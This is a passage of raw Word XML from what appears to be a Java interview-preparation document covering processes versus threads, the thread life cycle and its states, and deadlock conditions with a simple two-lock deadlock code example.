          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="246DCD5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rol</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="236B69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controlled by the operating system, but they are tightly coupled to the process. If the process terminates, all its threads are also terminated.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00376CCA" w:rsidRPr="00376CCA" w14:paraId="535F9B13" w14:textId="77777777" w:rsidTr="00891EBF">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3C84DDF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lastRenderedPageBreak/>
              <w:t>Concurrency</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="50454552"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an run concurrently but are more resource-intensive and slower to switch between.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0C8131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llow concurrent execution within a single process, making them more efficient for tasks that require shared data.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00376CCA" w:rsidRPr="00376CCA" w14:paraId="3ADFFBB0" w14:textId="77777777" w:rsidTr="00891EBF">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="15CD04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Isolation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7530230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are isolated from one another, meaning one process cannot directly interfere with another’s memory space or execution.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="52BD151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not isolated; one thread can potentially affect other threads in the same process by modifying shared data.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00376CCA" w:rsidRPr="00376CCA" w14:paraId="49201C98" w14:textId="77777777" w:rsidTr="00891EBF">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3DC755F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ext Switching</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2339EC6D"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processes is slower, as it requires switching memory contexts and updating process control blocks.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="002FE9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threads is faster because threads share the same memory space.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00376CCA" w:rsidRPr="00376CCA" w14:paraId="5394EDE9" w14:textId="77777777" w:rsidTr="00891EBF">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6FF5C08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Fault Tolerance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="41E88E1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fault or crash in one process does not directly affect other processes (unless they share resources).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="11A0742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f one thread crashes, it may cause the entire process to crash, as threads share the same memory.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1377D32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When to Use a Process vs. a Thread:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76EC0190"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Process</w:t>
      </w:r>
      <w:r w:rsidRPr="00376CCA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5704EA5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complete isolation from each other (e.g., running separate applications).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729E331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For running tasks that don’t require frequent communication with each other.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1BCBE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he overhead of inter-process communication (IPC) is acceptable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="576969C1"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Thread</w:t>
      </w:r>
      <w:r w:rsidRPr="00376CCA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="020AE3F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within the same application need to run concurrently and share data (e.g., handling multiple user requests in a web server).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D91056"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you need lightweight tasks that can be created and destroyed quickly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0054B2A0"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to operate in parallel within the same memory space.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C55669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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="034D66C2"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A web browser running multiple web pages or applications like Microsoft Word, which runs as a separate process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6BCF4E"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A multi-threaded web server where each request from a user is handled by a separate thread, allowing multiple requests to be processed concurrently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01FCD15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4" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="096D6FF6"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71" w:name="_Toc197867485"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain the Thread Life Cycle?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="271"/>
    </w:p>
    <w:p w14:paraId="4C8B1FA0" w14:textId="2F77C60B" w:rsidR="00891EBF" w:rsidRPr="00535E02" w:rsidRDefault="00891EBF" w:rsidP="00535E02">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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s:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6050446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can be in one of the following states:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="025CEB21"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Born) State:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B4FDF2"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hen a thread is created using the Thread class but hasn't started yet, it is in the "New" state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="577F0628"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is the initial state when a thread object is instantiated but the start() method has not been called.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1C03D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0CB80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0A10A02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The thread is in the "New" state</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ADDEC90"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p>
    <w:p w14:paraId="6EC920B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fter calling the start() method on the thread, it enters the "Runnable" state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F8BC2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In this state, the thread is ready to run, but it might not be executing immediately because the CPU scheduler might not have allocated CPU time to it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4556524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considered "Runnable" when it's either in the ready-to-run queue or actively executing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9F0CD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FBB690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13B9B0E7"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tart(); // The thread is now in the "Runnable" state</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C44297"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Waiting) State:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="653B8F4B"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A thread enters the "Blocked" state when it wants to access a synchronized block or method but cannot because another thread is holding the lock.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F5146D"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blocked until the lock is released by the other thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D1D6DD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5D0ACB0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21CDA04"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he thread may be blocked here if another thread is holding the lock</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E47D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03B2847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p>
    <w:p w14:paraId="729090B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Waiting" state when it is waiting indefinitely for another thread to perform a particular action.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0C7AE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state is usually achieved by calling methods like wait(), join(), or sleep() with no timeout.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD388D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2A36992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B9DFAE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someObject.wait(); // The thread enters "Waiting" state</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46AE6CC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2C90868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p>
    <w:p w14:paraId="3F85E0A1"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in the "Timed Waiting" state when it is waiting for a specified amount of time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E07566F"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in this state until the specified time has passed or it is interrupted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8BA0E9"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Examples of methods that put a thread in this state include sleep(millis), join(millis), wait(millis).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A8FA8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29F54B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leep(1000); // The thread is in the "Timed Waiting" state for 1 second</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05811A1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Dead) State:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D2ADA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Terminated" state when it has finished its execution or when it is forcibly terminated by calling interrupt().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="615C126A"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Once a thread reaches this state, it cannot be started again.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="243B624C"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536C5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run(); // After execution completes, the thread reaches "Terminated" state</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714DC6F8"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Life Cycle Flow:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD6FEF8"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w:t>
      </w:r>
      <w:r w:rsidRPr="00535E02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → The thread is created but not yet started.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06005912"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w:t>
      </w:r>
      <w:r w:rsidRPr="00535E02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → The thread is ready to run and waiting for CPU time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5665CD5F"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w:t>
      </w:r>
      <w:r w:rsidRPr="00535E02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → The thread is blocked, waiting for a lock.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A849A71"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w:t>
      </w:r>
      <w:r w:rsidRPr="00535E02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → The thread is waiting indefinitely for a specific condition or action.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C25AE39"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w:t>
      </w:r>
      <w:r w:rsidRPr="00535E02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → The thread is waiting for a specified period (e.g., sleep(), join() with timeout).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C99C45A"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w:t>
      </w:r>
      <w:r w:rsidRPr="00535E02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → The thread finishes its execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320EB672"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 Transitions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7979EFB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 Runnable</w:t>
      </w:r>
      <w:r w:rsidRPr="00535E02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The thread enters the runnable state when the start() method is invoked.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55EEBB3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Blocked</w:t>
      </w:r>
      <w:r w:rsidRPr="00535E02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A thread can transition to the blocked state when it tries to access a synchronized block or method that another thread is holding.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4291F8F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 Runnable</w:t>
      </w:r>
      <w:r w:rsidRPr="00535E02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Once the lock is released, the thread can move back to the runnable state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7509D5F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Waiting</w:t>
      </w:r>
      <w:r w:rsidRPr="00535E02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A thread enters the waiting state when it calls methods like wait() or join().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1562D062"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 Runnable</w:t>
      </w:r>
      <w:r w:rsidRPr="00535E02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The thread moves back to the runnable state when it is notified or when the specified wait time expires.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE0FD1F"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imed Waiting</w:t>
      </w:r>
      <w:r w:rsidRPr="00535E02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When the thread calls methods like sleep() or join() with a timeout, it enters the timed waiting state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="745B469B"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 Runnable</w:t>
      </w:r>
      <w:r w:rsidRPr="00535E02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: After the timeout expires or the thread is notified, it returns to the runnable state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB098EC"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erminated</w:t>
      </w:r>
      <w:r w:rsidRPr="00535E02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The thread reaches the terminated state when it finishes its execution or if it is interrupted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE7963C"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Diagram of Thread Life Cycle:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487B696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187FD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New         |  &lt;-- Thread created but not started</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191E53FE"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3B88F55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1037E73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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BACF03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487FDF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Runnable      |  &lt;-- Thread is ready to run but may not be executing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3025D47A"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 xml:space="preserve">       +-------------------+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3655229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7B1BCA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743EED5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2D22F8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Blocked |     | Waiting |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31AD736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6631233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0620C4E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322FB10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6AA7603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erminated        |  &lt;-- Thread finishes execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3221FAF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5CA4996F"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Key Points:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="319F25C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State</w:t>
      </w:r>
      <w:r w:rsidRPr="00535E02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The thread is just created but hasn’t started yet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4178C65E"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r w:rsidRPr="00535E02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The thread is in the ready-to-run queue, waiting for CPU allocation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="515EC8C8"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State</w:t>
      </w:r>
      <w:r w:rsidRPr="00535E02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The thread is blocked and waiting for a lock on a synchronized resource.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C49892F"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r w:rsidRPr="00535E02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The thread is waiting indefinitely for another thread to notify it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C20927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r w:rsidRPr="00535E02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The thread waits for a specified time before resuming.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="389F9029"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State</w:t>
      </w:r>
      <w:r w:rsidRPr="00535E02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The thread has completed its execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6A3FE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Understanding the thread life cycle is important for efficient multithreading, as it helps in managing and debugging threads effectively.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C954281" w14:textId="4D1C217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5" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD82C63" w14:textId="77777777" w:rsidR="00A02CC7" w:rsidRPr="00CE4B95" w:rsidRDefault="00A02CC7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="272" w:name="_Toc197867486"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is a deadlock? Explain with an example?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="272"/>
    </w:p>
    <w:p w14:paraId="171D3778" w14:textId="11D0D9D3" w:rsidR="00891EBF" w:rsidRPr="002C733C" w:rsidRDefault="00891EBF" w:rsidP="002C733C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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In simple terms,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occurs when two or more threads try to acquire locks on resources in an inconsistent or cyclic manner, leading to a state where none of them can proceed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="459490D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ditions for Deadlock</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F869EF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A deadlock situation arises when all the following four conditions are true:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A8D4F69"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Mutual Exclusion</w:t>
      </w:r>
      <w:r w:rsidRPr="002C733C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: At least one resource is held in a non-shareable mode, meaning only one thread can use the resource at a time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2C355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Hold and Wait</w:t>
      </w:r>
      <w:r w:rsidRPr="002C733C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A thread holding at least one resource is waiting for additional resources that are being held by other threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D079F1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No Preemption</w:t>
      </w:r>
      <w:r w:rsidRPr="002C733C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Resources cannot be forcibly taken from threads. A thread must release its held resources voluntarily.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="386F8761"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Circular Wait</w:t>
      </w:r>
      <w:r w:rsidRPr="002C733C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A set of threads are waiting for each other in a circular chain. For example, thread A waits for thread B to release a resource, thread B waits for thread C, and thread C waits for thread A.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A9736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ample of Deadlock</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64BCDDC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Consider the following example where two threads, Thread 1 and Thread 2, each have a lock on a resource and are waiting for each other to release the lock. This results in a deadlock situation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C941CD1"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de Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1922406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public class DeadlockExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="520CF439"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56021B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1 = new Object();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F4532B"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2 = new Object();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D275697" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="002C733C" w:rsidRDefault="00891EBF" w:rsidP="002C733C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09319AA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ublic static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F06AA32"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1 trying to lock lock1 and then lock2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DBC1C7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1 = new Thread(() -&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="449D45C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608A5B0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Holding lock1...");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D3DC5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78B7B3B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Waiting for lock2...");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A7563D8"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4484278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lastRenderedPageBreak/>
        <w:t xml:space="preserve">                    System.out.println("Thread 1: Acquired lock2!");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CECC8D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2E1004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CD44B0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75038D2" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="002C733C" w:rsidRDefault="00891EBF" w:rsidP="002C733C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BA096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2 trying to lock lock2 and then lock1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC8C6E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2 = new Thread(() -&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13832FE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2AD0D22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Holding lock2...");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="281A44C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12CE869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Waiting for lock1...");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="180E8D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0161B7E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Acquired lock1!");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD7E92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17B89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312164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67EE26BB" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="002C733C" w:rsidRDefault="00891EBF" w:rsidP="002C733C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3650B03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1.start();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5084D95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2.start();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1393A525"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33468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242634FD"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planation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CB965D"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1</w:t>
      </w:r>
